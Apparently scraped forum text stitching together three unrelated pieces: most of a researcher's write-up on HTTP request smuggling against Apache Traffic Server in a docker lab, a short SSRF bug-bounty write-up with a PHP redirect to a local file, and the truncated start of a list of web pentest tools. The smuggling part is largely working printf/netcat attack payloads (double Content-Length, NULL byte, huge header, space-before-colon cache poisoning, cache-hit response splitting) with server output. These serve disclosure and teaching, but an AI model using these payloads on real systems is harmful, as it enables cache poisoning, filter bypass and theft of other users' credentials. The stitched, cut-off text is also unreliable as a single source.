'GET /?cache=2 HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
'GET /?cache=3 HTTP/1.1\r\n'\
'Host:dummy-host6.example.com\r\n'\
'\r\n'\
'GET /?cache=4 HTTP/1.1\r\n'\
'Host:dummy-host6.example.com\r\n'\
'\r\n'\
| nc localhost 8001

This is pipelining; it's not only using HTTP keep-alive, because we send the chain of queries without waiting for the responses. See my previous post for details on keep-alive and pipelining. You should see the Nginx access log in the docker-compose output. If you do not rotate some arguments in the query, Nginx won't get reached by your requests, because ATS is already caching the result (CTRL+C on the docker-compose output and docker-compose up will remove any cache).

Request Splitting by Double Content-Length

Let's start a real play. That's the 101 of HTTP smuggling: the easy vector. Double Content-Length header support is strictly forbidden by RFC 7230 section 3.3.3 (bold added):

If a message is received without Transfer-Encoding and with either multiple Content-Length header fields having differing field-values or a single Content-Length header field having an invalid value, then the message framing is invalid and the recipient MUST treat it as an unrecoverable error. If this is a request message, the server MUST respond with a 400 (Bad Request) status code and then close the connection. If this is a response message received by a proxy, the proxy MUST close the connection to the server, discard the received response, and send a 502 (Bad Gateway) response to the client. If this is a response message received by a user agent, the user agent MUST close the connection to the server and discard the received response.

Differing interpretations of message length based on the order of Content-Length headers were the first demonstrated HTTP smuggling attacks (2005).
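When building such payloads you constantly need to know the exact byte length of the part you are smuggling. As a sanity check you can count, offline and without the lab, the bytes of the tail that the second Content-Length in the next attack (66) claims as "body":

```shell
# The hidden tail of the double Content-Length attack, final CRLF
# included, is exactly 66 bytes -- the value the second
# Content-Length header announces.
printf 'GET /index.html?toto=2 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
| wc -c
```

If you change the path or query string, recompute this number or the smuggled request will be truncated or will swallow part of the next query.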
Sending such a query directly to ATS generates two responses (one 400 and one 200):

printf 'GET /index.html?toto=1 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Content-Length: 0\r\n'\
'Content-Length: 66\r\n'\
'\r\n'\
'GET /index.html?toto=2 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
|nc -q 1 localhost 8007

The regular response should be a single 400 error. Using port 8001 (HaProxy) would not work; HaProxy is a robust HTTP agent and cannot be fooled by such an easy trick. This is critical request splitting, classical, but hard to reproduce in a real-life environment if some robust tools are used in the reverse proxy chain. So, why critical? Because you could also consider ATS to be robust, use a new unknown HTTP server behind or in front of ATS, and expect such smuggling attacks to be properly detected.

And there is another factor of criticality: any other issue in HTTP parsing can exploit this double Content-Length. Let's say you have another issue which allows you to hide one header from all other HTTP actors, but reveals this header to ATS. Then you just have to use this hidden header for a second Content-Length and you're done, without being blocked by a previous actor. In our current case, ATS, you have one example of such a hidden-header issue with the 'space-before-:' that we will analyze later.

Request Splitting by NULL Character Injection

This example is not the easiest one to understand (go to the next one if you do not get it, or even the one after); it also does not have the biggest impact, as we will use a really bad query to attack, easily detected. But I love the magical NULL (\0) character. Using a NULL byte character in a header triggers a query rejection on ATS, that's ok, but also a premature end of query, and if you do not close pipelines after a first error, bad things could happen. The next line is interpreted as the next query in the pipeline.
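Before building the attack you can check locally that printf really puts a NUL byte into the stream (command substitution and many text tools silently drop NULs, so counting bytes is the reliable check):

```shell
# od -c makes the \0 visible on the wire; wc -c confirms the count:
# 'X-Something: ' (13) + NUL (1) + ' something' (10) + CRLF (2) = 26 bytes.
printf 'X-Something: \0 something\r\n' | od -c | head -n 2
printf 'X-Something: \0 something\r\n' | wc -c
```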
So, a valid (almost, if you except the NULL character) pipeline like this one:

01 GET /does-not-exists.html?foofoo=1 HTTP/1.1\r\n
02 X-Something: \0 something\r\n
03 X-Foo: Bar\r\n
04 \r\n
05 GET /index.html?bar=1 HTTP/1.1\r\n
06 Host: dummy-host7.example.com\r\n
07 \r\n

generates two 400 errors, because the second query starts with X-Foo: Bar\r\n and that's an invalid first query line. Let's test an invalid pipeline (as there is no \r\n between the 2 queries):

01 GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n
02 X-Something: \0 something\r\n
03 GET /index.html?bar=2 HTTP/1.1\r\n
04 Host: dummy-host7.example.com\r\n
05 \r\n

It generates one 400 error and one 200 OK response. Lines 03/04/05 are taken as a valid query. This is already an HTTP request splitting attack. But line 03 is a really bad header line that most agents would reject; you cannot read that as a valid unique query. The fake pipeline would be detected early as a bad query, I mean line 03 is clearly not a valid header line:

GET /index.html?bar=2 HTTP/1.1\r\n
!= <HEADER-NAME-NO-SPACE>[:][SP]<HEADER-VALUE>[CR][LF]

For the first line the syntax is one of these two forms:

<METHOD>[SP]<LOCATION>[SP]HTTP/[M].[m][CR][LF]
<METHOD>[SP]<http[s]://LOCATION>[SP]HTTP/[M].[m][CR][LF] (absolute uri)

LOCATION may be used to inject the special [:] that is required in a header line, especially in the query string part, but this would inject a lot of bad characters into the HEADER-NAME-NO-SPACE part, like '/' or '?'. Let's try the ABSOLUTE-URI alternative syntax, where the [:] comes earlier on the line, and the only bad character for a header name would be the space. This will also fix the potential presence of a double Host header (an absolute uri replaces the Host header).
01 GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n
02 Host: dummy-host7.example.com\r\n
03 X-Something: \0 something\r\n
04 GET http://dummy-host7.example.com/index.html?bar=2 HTTP/1.1\r\n
05 \r\n

Here the bad header which becomes a query is line 04, and the header name is GET http with a header value of //dummy-host7.example.com/index.html?bar=2 HTTP/1.1. That's still an invalid header (the header name contains a space) but I'm pretty sure we could find some HTTP agent transferring this header (ATS is one proof of that, a space character in header names was allowed). A real attack using this trick will look like this:

printf 'GET /something.html?zorg=1 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'X-Something: "\0something"\r\n'\
'GET http://dummy-host7.example.com/index.html?replacing=1&zorg=2 HTTP/1.1\r\n'\
'\r\n'\
'GET /targeted.html?replaced=maybe&zorg=3 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
|nc -q 1 localhost 8007

This is just 2 queries (the 1st one has 2 bad headers: one with a NULL, one with a space in the header name); for ATS it's 3 queries. The regular second one (/targeted.html) -- third for ATS -- will get the response of the hidden query (http://dummy-host7.example.com/index.html?replacing=1&zorg=2). Check the X-Location-echo: header added by Nginx. After that ATS adds a third response, a 404, but the previous actor expects only 2 responses, and the second response is already replaced.

HTTP/1.1 400 Invalid HTTP Request
Date: Fri, 26 Oct 2018 15:34:53 GMT
Connection: keep-alive
Server: ATS/7.1.1
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Content-Length: 220

<HTML>
<HEAD>
<TITLE>Bad Request</TITLE>
</HEAD>
<BODY BGCOLOR="white" FGCOLOR="black">
<H1>Bad Request</H1>
<HR>
<FONT FACE="Helvetica,Arial"><B>
Description: Could not process this request.
</B></FONT>
<HR>
</BODY>

Then:

HTTP/1.1 200 OK
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 15:34:53 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
ETag: "5bd321bc-78"
X-Location-echo: /index.html?replacing=1&zorg=2
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes
Age: 0
Connection: keep-alive

$<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

And then the extra unused response:

HTTP/1.1 404 Not Found
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 15:34:53 GMT
Content-Type: text/html
Content-Length: 153
Age: 0
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.15.5</center>
</body>
</html>

If you try to use port 8001 (and so transit via HaProxy) you will not get the expected attacking result. That attacking query is really too bad:

HTTP/1.0 400 Bad request
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>400 Bad request</h1>
Your browser sent an invalid request.
</body></html>

That's an HTTP request splitting attack, but real-world usage may be hard to find. The fix on ATS is the 'close on error': when a 400 error is triggered the pipeline is stopped and the socket is closed after the error.

Request Splitting using Huge Header, Early End-Of-Query

This attack is almost the same as the previous one, but it does not need the magical NULL character to trigger the end-of-query event. By using headers with a size of around 65536 characters we can trigger this event, and exploit it the same way as with the NULL premature end of query.

A note on huge header generation with printf. Here I'm generating a query with one header containing a lot of repeated characters (= or 1 for example):

X: ==============( 65 532 '=' )========================\r\n

You can use the %ns form in printf to generate this, producing a big number of spaces.
But to do that we need to replace some special characters with tr and use _ instead of spaces in the original string:

printf 'X:_"%65532s"\r\n' | tr " " "=" | tr "_" " "

Try it against Nginx:

printf 'GET_/something.html?zorg=6_HTTP/1.1\r\n'\
'Host:_dummy-host7.example.com\r\n'\
'X:_"%65532s"\r\n'\
'GET_http://dummy-host7.example.com/index.html?replaced=0&cache=8_HTTP/1.1\r\n'\
'\r\n'\
|tr " " "1"\
|tr "_" " "\
|nc -q 1 localhost 8002

I get one 400 error, that's the normal stuff; Nginx does not like huge headers. Now try it against ATS7:

printf 'GET_/something.html?zorg2=5_HTTP/1.1\r\n'\
'Host:_dummy-host7.example.com\r\n'\
'X:_"%65534s"\r\n'\
'GET_http://dummy-host7.example.com/index.html?replaced=0&cache=8_HTTP/1.1\r\n'\
'\r\n'\
|tr " " "1"\
|tr "_" " "\
|nc -q 1 localhost 8007

And after the 400 error we have a 200 OK response. Same problem as in the previous example, and same fix. Here we still have a query with a bad header containing a space, and also one quite big header, but we do not have the NULL character. But, yeah, 65000 characters is very big; most actors would reject a query after 8000 characters on one line.

HTTP/1.1 400 Invalid HTTP Request
Date: Fri, 26 Oct 2018 15:40:17 GMT
Connection: keep-alive
Server: ATS/7.1.1
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Content-Length: 220

<HTML>
<HEAD>
<TITLE>Bad Request</TITLE>
</HEAD>
<BODY BGCOLOR="white" FGCOLOR="black">
<H1>Bad Request</H1>
<HR>
<FONT FACE="Helvetica,Arial"><B>
Description: Could not process this request.
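You can check the generator offline before aiming it at the lab; the produced header line should be 65539 bytes ('X:' + space + quote + 65532 padding characters + quote + CRLF):

```shell
# %65532s expands to 65532 spaces; the first tr rewrites the padding
# to '=' and the second turns the '_' placeholder back into a space.
printf 'X:_"%65532s"\r\n' | tr " " "=" | tr "_" " " | head -c 20; echo
printf 'X:_"%65532s"\r\n' | tr " " "=" | tr "_" " " | wc -c
```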
</B></FONT>
<HR>
</BODY>

HTTP/1.1 200 OK
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 15:40:17 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
ETag: "5bd321bc-78"
X-Location-echo: /index.html?replaced=0&cache=8
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes
Age: 0
Connection: keep-alive

$<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

Cache Poisoning using Incomplete Queries and Bad Separator Prefix

Cache poisoning, that sounds great. In smuggling attacks you should only have to trigger a request or response splitting attack to prove a defect, but when you push that to cache poisoning people usually understand better why split pipelines are dangerous.

ATS supports an invalid header syntax:

HEADER[SPACE]:HEADER VALUE\r\n

That does not conform to RFC 7230 section 3.2:

Each header field consists of a case-insensitive field name followed by a colon (":"), optional leading whitespace, the field value, and optional trailing whitespace.

So:

HEADER:HEADER_VALUE\r\n                => OK
HEADER:[SPACE]HEADER_VALUE\r\n         => OK
HEADER:[SPACE]HEADER_VALUE[SPACE]\r\n  => OK
HEADER[SPACE]:HEADER_VALUE\r\n         => NOT OK

And RFC 7230 section 3.2.4 adds (bold added):

No whitespace is allowed between the header field-name and colon. In the past, differences in the handling of such whitespace have led to security vulnerabilities in request routing and response handling. A server MUST reject any received request message that contains whitespace between a header field-name and colon with a response code of 400 (Bad Request). A proxy MUST remove any such whitespace from a response message before forwarding the message downstream.

ATS will interpret the bad header, and also forward it without alteration.
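The RFC rule above is mechanical enough to sketch as a check. This is a simplified approximation of the RFC 7230 token grammar (the real tchar set is slightly larger), just to show which of the example lines pass:

```shell
# Accept only lines whose field-name is made of token characters and is
# immediately followed by ':' -- any whitespace before the colon fails.
# Simplified tchar set; good enough to catch the space-before-colon trick.
is_valid_header() {
  printf '%s' "$1" | grep -Eq '^[A-Za-z0-9!#$%&*+.^_|~-]+:'
}
is_valid_header 'Content-Length: 66' && echo accepted
is_valid_header 'Content-Length :66' || echo rejected
```

A parser that applies this check and a parser that silently strips the space will frame the same byte stream differently, which is exactly the desynchronization the next attack exploits.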
Using this flaw we can add some headers in our request that are invalid for any valid HTTP agent but still interpreted by ATS, like:

Content-Length :77\r\n

Or (try it as an exercise):

Transfer-encoding :chunked\r\n

Some HTTP servers will effectively reject such a message with a 400 error. But some will simply ignore the invalid header. That's the case of Nginx, for example.

ATS will maintain a keep-alive connection to the Nginx backend, so we'll use this ignored header to transmit a body (ATS thinks it's a body) that is in fact a new query for the backend. And we'll make this query incomplete (missing a crlf at the end-of-header) to absorb a future query sent to Nginx. This sort of incomplete query filled by the next incoming query is also a basic smuggling technique demonstrated 13 years ago.

01 GET /does-not-exists.html?cache=x HTTP/1.1\r\n
02 Host: dummy-host7.example.com\r\n
03 Cache-Control: max-age=200\r\n
04 X-info: evil 1.5 query, bad CL header\r\n
05 Content-Length :117\r\n
06 \r\n
07 GET /index.html?INJECTED=1 HTTP/1.1\r\n
08 Host: dummy-host7.example.com\r\n
09 X-info: evil poisoning query\r\n
10 Dummy-incomplete:

Line 05 is invalid (' :'). But for ATS it is valid. Lines 07/08/09/10 are just binary body data for ATS, transmitted to the backend. For Nginx: line 05 is ignored, line 07 is a new request (and the first response is returned), and line 10 has no "\r\n", so Nginx is still waiting for the end of this query, on the keep-alive connection opened by ATS ...
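The 117 in line 05 is not arbitrary: it has to cover exactly the incomplete request of lines 07-10. With the 'Dummy-unterminated:' header name used in the attack loop that follows (19 bytes, no CRLF), the arithmetic works out, and you can verify it offline:

```shell
# 37 + 31 + 30 + 19 = 117 bytes: the bad 'Content-Length :117' makes ATS
# swallow exactly this unterminated request as body data.
printf 'GET /index.html?INJECTED=1 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'X-info: evil poisoning query\r\n'\
'Dummy-unterminated:'\
| wc -c
```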
Attack schema [ATS Cache poisoning - space before header separator + backend ignoring bad headers]

Innocent        Attacker           ATS               Nginx
    |               |                |                 |
    |               |--A(1A+1/2B)--->|                 |   * Issue 1 & 2 *
    |               |                |--A(1A+1/2B)---->|   * Issue 3 *
    |               |                |<-A(404)---------|
    |               |                |          [1/2B] |
    |               |<-A(404)--------|          [1/2B] |
    |               |--C------------>|          [1/2B] |
    |               |                |--C------------->|   * ending B *
    |               |           [*CP*]<--B(200)--------|
    |               |<--B(200)-------|                 |
    |--C---------------------------->|                 |
    |<--B(200)---------------------[HIT]               |

1A + 1/2B means request A + an incomplete query B
A(X): means the X query is hidden in the body of query A
CP: Cache poisoning
Issue 1: ATS transmits 'header[SPACE]: Value', a bad HTTP header.
Issue 2: ATS interprets this bad header as valid (so 1/2B stays hidden in the body).
Issue 3: Nginx encounters the bad header but ignores it instead of sending a 400 error, so 1/2B is discovered as a new query (no Content-Length).
Request B contains an incomplete header (no crlf).
Ending B: the 1st line of query C ends the incomplete header of query B; all the other headers are added to the query. C disappears and mixes C's HTTP credentials with all the previous B headers (cookie/bearer token/Host, etc.).

Instead of cache poisoning you could also play with the incomplete 1/2B query and wait for an innocent query to finish this request with the HTTP credentials of that user (cookies, HTTP Auth, JWT tokens, etc.). That would be another attack vector. Here we will simply demonstrate cache poisoning. Run this attack:

for i in {1..9} ;do
printf 'GET /does-not-exists.html?cache='$i' HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-Control: max-age=200\r\n'\
'X-info: evil 1.5 query, bad CL header\r\n'\
'Content-Length :117\r\n'\
'\r\n'\
'GET /index.html?INJECTED='$i' HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'X-info: evil poisoning query\r\n'\
'Dummy-unterminated:'\
|nc -q 1 localhost 8007
done

It should work. Nginx adds an X-Location-echo header in this lab configuration, where the first line of the query is echoed in the response headers.
This way we can observe that the second response is removing the real second query's first line and replacing it with the hidden first line. In my case the last query response contained:

X-Location-echo: /index.html?INJECTED=3

But this last query was GET /index.html?INJECTED=9. You can check the cache content with:

for i in {1..9} ;do
printf 'GET /does-not-exists.html?cache='$i' HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-Control: max-age=200\r\n'\
'\r\n'\
|nc -q 1 localhost 8007
done

In my case I found six 404 (regular) and three 200 responses (ouch); the cache is poisoned. If you want to go deeper into understanding smuggling you should try to play with wireshark on this example. Do not forget to restart the cluster to empty the cache.

Here we did not play with a C query yet; the cache poisoning occurs on our A query, unless you consider the /does-not-exists.html?cache='$i' requests as C queries. But you can easily try to inject a C query into this cluster while Nginx has some waiting requests, and try to get it poisoned with /index.html?INJECTED=3 responses:

for i in {1..9} ;do
printf 'GET /innocent-C-query.html?cache='$i' HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-Control: max-age=200\r\n'\
'\r\n'\
|nc -q 1 localhost 8007
done

This may give you a feel for real-world exploitation: you have to repeat the attack to obtain something. Vary the number of servers in the cluster, the pool settings on the various layers of reverse proxies, etc. Things get complex. The easiest attack is to be a chaos generator (defacement-like or DoS); fine cache replacement of a target, on the other hand, requires careful study and a bit of luck.

Does this work on port 8001 with HaProxy? Well, no, of course not. Our header syntax is invalid. You would need to hide the bad query syntax from HaProxy, maybe using another smuggling issue, to hide this bad request in a body. Or you would need a load balancer which does not detect this invalid syntax.
Note that in this example the Nginx behavior on invalid header syntax (ignoring it) is also not standard (and won't be fixed, AFAIK). This invalid space-prefix problem is the same issue as Apache httpd's CVE-2016-8743.

HTTP Response Splitting: Content-Length Ignored on Cache Hit

Still there? Great! Because now comes the nicest issue. At least for me it was the nicest, mainly because I spent a lot of time around it without understanding it.

I was fuzzing ATS, and my fuzzer detected issues. Trying to reproduce, I had failures, and successes on previously undetected issues, and back to step 1. Issues you cannot reproduce: you start doubting that you saw them before. Suddenly you find one again, but then no, etc. And of course I was not searching for the root cause in the right examples. I was, for example, triggering tests on bad chunked transmissions, or delayed chunks. It took a very long (too long) time before I realized that all this was linked to the cache hit/cache miss status of my requests.

On a cache hit, the Content-Length header of a GET query is not read. That's so easy when you know it... And exploitation is also quite easy. We can hide a second query in the first query's body, and on a cache hit this body becomes a new query. This sort of query will get one response at first (and, yes, that's only one query); on a second launch it will render two responses (so an HTTP request splitting by definition):

01 GET /index.html?cache=zorg42 HTTP/1.1\r\n
02 Host: dummy-host7.example.com\r\n
03 Cache-control: max-age=300\r\n
04 Content-Length: 71\r\n
05 \r\n
06 GET /index.html?cache=zorg43 HTTP/1.1\r\n
07 Host: dummy-host7.example.com\r\n
08 \r\n

Line 04 is ignored on a cache hit (so only after the first run); after that, line 06 is a new query and not just the 1st query's body. This HTTP query is valid: THERE IS NO invalid HTTP syntax present. So it's quite easy to perform a successful complete smuggling attack from this issue, even using HaProxy in front of ATS.
If HaProxy is configured to use a keep-alive connection to ATS, we can fool HaProxy's HTTP stream by sending a pipeline of two queries where ATS sees three:

Attack schema [ATS HTTP-Splitting issue on Cache hit + GET + Content-Length]

Something       HaProxy            ATS               Nginx
    |--A----------->|               |                 |
    |               |--A----------->|                 |
    |               |               |--A------------->|
    |               |          [cache]<--A------------|
    |               |<--A-----------|                 |
 (etc.)<------------|               |                 |     warmup
 ---------------------------------------------------------
    |--A(+B)+C----->|               |                 |     attack
    |               |--A(+B)+C----->|                 |
    |               |             [HIT]               |     * Bug *
    |               |<--A-----------|                 |     * B 'discovered' *
    |<--A-----------|               |--B------------->|
    |               |               |<-B--------------|
    |               |<-B------------|                 |
 [ouch]<-B----------|               |                 |     * wrong resp. *
    |               |--C----------->|                 |
    |               |<--C-----------|                 |
  [R]<--C-----------|               |                 |     rejected

First, we need to init the cache; we use port 8001 to get a stream HaProxy->ATS->Nginx:

printf 'GET /index.html?cache=cogip2000 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-control: max-age=300\r\n'\
'Content-Length: 0\r\n'\
'\r\n'\
|nc -q 1 localhost 8001

You can run it two times and see that the second time it does not reach the nginx access.log. Then we attack HaProxy, or any other cache set in front of this HaProxy. We use a pipeline of 2 queries; ATS will send back 3 responses. If a keep-alive mode is present in front of ATS there is a security problem. Here that's the case because we do not use option http-close on HaProxy (which would prevent usage of pipelines).

printf 'GET /index.html?cache=cogip2000 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-control: max-age=300\r\n'\
'Content-Length: 74\r\n'\
'\r\n'\
'GET /index.html?evil=cogip2000 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
'GET /victim.html?cache=zorglub HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
|nc -q 1 localhost 8001

The query for /victim.html (which should be a 404 in our example) gets the response for /index.html (X-Location-echo: /index.html?evil=cogip2000).
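Same bookkeeping as in the earlier attacks: the Content-Length: 74 must match the hidden /index.html?evil=cogip2000 query byte for byte, which you can confirm offline:

```shell
# 41 + 31 + 2 = 74 bytes: the hidden query B that the cache-hit bug
# turns into a standalone request on the second run.
printf 'GET /index.html?evil=cogip2000 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
| wc -c
```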
HTTP/1.1 200 OK
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 16:05:41 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
ETag: "5bd321bc-78"
X-Location-echo: /index.html?cache=cogip2000
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes
Age: 12

$<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

HTTP/1.1 200 OK
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 16:05:53 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
ETag: "5bd321bc-78"
X-Location-echo: /index.html?evil=cogip2000
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes
Age: 0

$<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

Here the issue is critical, especially because there is no invalid syntax in the attacking query. We have an HTTP response splitting, which means two main impacts:

ATS may be used to poison or hurt an actor used in front of it;
the second query is hidden (it's a body: binary garbage for an HTTP actor), so any security filter set in front of ATS cannot block the 2nd query. We could use that to hide a second layer of attack, like the ATS cache poisoning described in the other attacks.

Now that you have a working lab you can try embedding several layers of attacks... That's what the 'Drain the request body if there is a cache hit' fix is about.

Just to better understand the real-world impact: here the only one receiving response B instead of C is the attacker. HaProxy is not a cache, so the mix of C-request/B-response on HaProxy is not a real direct threat. But if there is a cache in front of HaProxy, or if we use several chained ATS proxies...
Timeline

2017-12-26: Report to project maintainers
2018-01-08: Acknowledgment by project maintainers
2018-04-16: Version 7.1.3 with most of the fixes
2018-08-04: Versions 7.1.4 and 6.2.2 (officially containing all the fixes, and some other CVE fixes)
2018-08-28: CVE announce
2019-09-17: This article (yes, the url date is wrong; the real date is September)

See also

Video Defcon 24: HTTP Smuggling
Defcon support
Video Defcon demos

Sursa: https://regilero.github.io/english/security/2019/10/17/security_apache_traffic_server_http_smuggling/
  21. 1 point
SSRF | Reading Local Files from DownNotifier server
Posted on September 18, 2019 by Leon

Hello guys, this is my first write-up and I would like to share it with the bug bounty community; it's a SSRF I found some months ago.

DownNotifier is an online tool to monitor website downtime. This tool sends an alert to a registered email and sms when the website is down. DownNotifier has a BBP on Openbugbounty, so I decided to take a look at https://www.downnotifier.com. When I browsed to the website, I noticed a text field for a URL, and an SSRF vulnerability quickly came to mind.

Getting XSPA

The first thing to do is add http: on the "Website URL" field. Select "When the site does not contain a specific text" and write any random text. I sent that request, and two emails arrived in my mailbox a few minutes later. The first alerts that a website is being monitored, and the second alerts that the website is down, but with the response inside an html file. And what is the response...?

Getting Local File Read

I was excited, but that's not enough to fetch very sensitive data, so I tried the same process with some uri schemes such as file, ldap, gopher, ftp and ssh, but it didn't work. I was thinking about how to bypass that filter and remembered a write-up mentioning a bypass using a redirect with the Location header in a PHP file hosted on your own domain.

I hosted a php file with the above code and went through the same process, registering a website to monitor. A few minutes later an email arrived at the mailbox with an html file. And the response was...

I reported the SSRF to DownNotifier support and they fixed the bug very fast. I want to thank the DownNotifier support because they were very kind in our communication and allowed me to publish this write-up. I also want to thank the bug bounty hunter who wrote the write-up where he used the redirect technique with the Location header.
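The redirector PHP file itself is only shown as an image in the original post, so its exact content is not reproduced here. A minimal guess at what such a Location-redirect file looks like (the filename and the file:// target path are illustrative assumptions, not the author's actual code):

```shell
# Hypothetical reconstruction: DownNotifier fetches the monitored URL
# over http://, receives this Location header, and follows the
# redirect into the local filesystem via a file:// URI.
cat > redirect.php <<'EOF'
<?php
// illustrative target path -- an assumption, not the original payload
header('Location: file:///etc/passwd');
EOF
grep -c 'Location:' redirect.php
```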
Write-up: https://medium.com/@elberandre/1-000-ssrf-in-slack-7737935d3884 Sursa: https://www.openbugbounty.org/blog/leonmugen/ssrf-reading-local-files-from-downnotifier-server/
  22. 1 point
    Stuff Youtube Link : https://www.youtube.com/channel/UC3VydBGBl132baPCLeDspMQ
  23. 1 point
In the absence of a warning system, now in 2019, I would like to present a few links related to the topic of earthquakes. I hope I'm not straying too far from the subject, but maybe it's somehow related.

Useful links - web - earthquake alerts:
1- https://web.telegram.org/#/im?p=@alertaCutremur
2- http://alerta.infp.ro/
3- https://twitter.com/earthbotro
4- https://twitter.com/incdfp
5- https://twitter.com/cutremurinfo
6- https://www.facebook.com/earthbotro
7- https://www.messenger.com/t/earthbotro

I also recommend installing browser extensions of the tab-auto-refresh kind.

Link for the National Institute for Research and Development in Earth Physics: http://www.infp.ro/ or www.infp.ro/data/cam-image-320.jpg (requires an F5 refresh)
Link for earthquake alerts: http://alerta.infp.ro/ or http://resyr.infp.ro/results.php
Link for the Romanian seismograph:
Link for the live recording of the MLR seismograph: http://www.mobotix.ro/camere_supraveghere_live_ro_928.html
Link for Mobotix Live Streaming: http://streaming.mobotixtools.com/live/5271f19a1048b

Since now, in 2019, the situation has evolved backwards and the two addresses above no longer work. What matters is that the camera is a good quality one worth 2000 dollars (M12D-Sec-DNight)... probably the whole populace isn't supposed to see what that quality camera records, let's not even talk about it... off off off...

Other links/sources for viewing the Romanian seismograph: https://ecrantv.ro/3852/webcam-observatorul-seismic-muntele-rosu/ or www.infp.ro/data/cam-image-320.jpg or 92 87 22 214 ("those who know, know").
  26. 1 point
Python is interpreted, so you can take a look at how JS is made. In JavaScript: The Good Parts I think I saw an example of a state machine.
  27. 1 point
A powerful small guide to dealing with Cross-Site Scripting in web application bug hunting and security assessments. Download link: https://www.pdfdrive.com/xss-cheat-sheet-d158319463.html
  28. 1 point
Your avatar suits you >a kind of antivirus that also roots your phone. Well, if you've only had MediaTeks, it's logical that supersu/kingroot worked for you. Go with xda, as OKQL said.
  32. 1 point
Man, I've been following this forum from the shadows for some time, I haven't posted anymore. But how clueless can you people be? Does your stupidity have no limits? What database, man? That one was of people from the 90s; 80% of those in that database have died. All you dream of is filelist invitations, codes, dorks and databases. You wouldn't do anything for your own future. You have people here who are Linux gurus, who know Python and other useful things, and you ask for databases.
  33. 1 point
I added support for Windows x64, Linux x86 and Linux x64. https://www.defcon.org/html/defcon-27/dc-27-demolabs.html#Shellcode Compiler
  34. 1 point
32/64 bit versions. Sharing is caring. Download link: https://mega.nz/?fbclid=IwAR3DhN9QsjIrDsdGHq-HQPjh15ghzefhx28wUUBZ0UGdeTyfhmutezFclSQ#F!8xh1EIyI!5cZd5_e-LI4Akw7YVYoBNA
  35. 1 point
Pretty quiet around here
  36. 1 point
Hello. I have two Instagram accounts for sale!

1. Instagram account with over 4300 followers.
- All added manually.
- 100% Romanian.
- Gets around 400-1500 likes per post.
- The niche is comedy.
- You can turn it into your personal account.
- Price: 40 euro. I don't negotiate, this is the market price + I worked on it for a month... and, most importantly, they were added manually.

2. Account with over 2500 followers.
- Added manually.
- 50% Romanian - 50% foreign.
- Gathers around 300 likes per post.
- Niche: Inna fan page.
- Price: 15 euro.

If you buy both, I'll let them go for 50 euro. Link in pm
  37. 1 point
Sursa: https://m.habr.com/ru/company/dsec/blog/452836/
Digital Security Company Blog - Information Security - Network technologies
forkyforky, May 28

Web tools, or where should a pentester start?

We continue to talk about useful tools for pentesters. In this new article we will look at tools for analyzing the security of web applications. Our colleague BeLove already did a similar selection about seven years ago. It is interesting to see which tools have retained and strengthened their positions, and which have faded into the background and are now rarely used. Note that Burp Suite also belongs here, but there will be a separate publication about it and its useful plugins.

Content:
Amass
Altdns
aquatone
MassDNS
nsec3map
Acunetix
Dirsearch
wfuzz
ffuf
gobuster
Arjun
LinkFinder
Jsparser
sqlmap
NoSQLMap
oxml_xxe
tplmap
CeWL
Weakpass
AEM_hacker
Joomscan
WPScan

Amass

Amass is a Go tool for searching and enumerating DNS subdomains and mapping an external network. Amass is an OWASP project created to show how organizations on the Internet look to an outsider. Amass gets the names of subdomains in various ways: the tool uses both recursive enumeration of subdomains and searches of open sources. To find connected network segments and autonomous system numbers, Amass uses the IP addresses obtained during operation. All the information found is used to build a network map.
Pros:
Information collection techniques include:
* DNS - dictionary-based subdomain enumeration, subdomain brute forcing, "smart" enumeration using mutations based on already-found subdomains, reverse DNS queries, and searching for DNS servers that allow a zone transfer (AXFR);
